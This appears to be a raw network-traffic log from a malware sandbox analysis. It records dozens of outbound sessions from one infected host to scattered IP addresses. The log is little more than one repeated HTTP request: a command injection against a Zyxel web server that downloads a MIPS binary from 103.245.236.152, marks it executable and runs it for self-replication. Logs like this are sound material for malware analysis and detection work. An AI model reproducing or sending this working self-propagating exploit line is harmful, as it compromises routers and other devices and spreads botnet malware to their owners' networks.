                                        Jan 14, 2024 16:18:32.163245916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1093192.168.2.1343002172.140.135.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163299084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1094192.168.2.1354440113.28.176.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163341999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1095192.168.2.1346182133.119.164.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163415909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1096192.168.2.13386841.134.115.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163467884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1097192.168.2.1359404199.49.243.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163510084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1098192.168.2.134809623.254.114.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163568020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1099192.168.2.1360524137.73.250.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163630962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1100192.168.2.1334208208.45.20.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163685083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1101192.168.2.1344424206.154.195.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163742065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1102192.168.2.135100876.69.166.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163775921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1103192.168.2.1355724182.113.143.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163836002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1104192.168.2.133613214.84.152.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163885117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1105192.168.2.133625837.118.111.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163944006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1106192.168.2.1333528173.16.137.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163979053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1107192.168.2.1344152194.185.196.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164036036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1108192.168.2.133283818.166.194.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164091110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1109192.168.2.135313893.178.185.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164120913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1110192.168.2.133615244.153.50.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164151907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1111192.168.2.136004078.13.211.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164203882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1112192.168.2.135503888.140.140.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164267063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1113192.168.2.1354894196.20.197.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164314985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1114192.168.2.135395269.15.51.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164370060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1115192.168.2.1340604143.229.240.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164457083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1116192.168.2.13452801.235.151.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164474010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1117192.168.2.1353096164.139.99.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164494991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1118192.168.2.135684443.39.255.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164566040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1119192.168.2.134399095.219.164.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164624929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1120192.168.2.135431825.165.232.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164665937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1121192.168.2.134473423.209.23.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164747000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1122192.168.2.1338562207.17.247.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164803982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1123192.168.2.13393809.65.52.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164860964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1124192.168.2.1355518157.73.113.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164932966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1125192.168.2.1347892179.254.156.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.164978981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1126192.168.2.1339540165.58.194.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165045023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1127192.168.2.1360894179.98.42.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165097952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1128192.168.2.134999054.206.218.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165134907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1129192.168.2.1333466153.27.33.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165179968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1130192.168.2.1355536187.216.26.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165213108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1131192.168.2.1356344167.33.61.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165290117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1132192.168.2.135390463.136.15.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165349007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1133192.168.2.134164031.233.196.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165411949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1134192.168.2.1360592130.240.19.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165440083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1135192.168.2.135835045.2.6.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165492058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1136192.168.2.133470499.20.44.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165527105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1137192.168.2.134281499.80.208.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165568113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1138192.168.2.1338574174.111.187.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165627003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1139192.168.2.1332824105.12.144.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165678024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1140192.168.2.133909235.6.124.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165713072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1141192.168.2.1360408141.136.157.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165771008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1142192.168.2.133848627.113.251.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165807009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1143192.168.2.133936647.152.90.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165877104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1144192.168.2.1357592140.187.134.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165920973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1145192.168.2.1352248116.122.141.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.165991068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1146192.168.2.1340824130.58.48.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166029930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1147192.168.2.1354068110.81.48.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166083097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1148192.168.2.1347262175.210.173.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166157007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1149192.168.2.135434869.176.103.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166213989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1150192.168.2.134019024.133.249.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166261911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1151192.168.2.135169664.237.23.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166322947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1152192.168.2.1337904153.67.68.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166382074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1153192.168.2.134989617.4.15.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166450024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1154192.168.2.1348992191.38.53.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166490078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1155192.168.2.1355852168.98.37.122443
                                        TimestampBytes transferredDirectionData
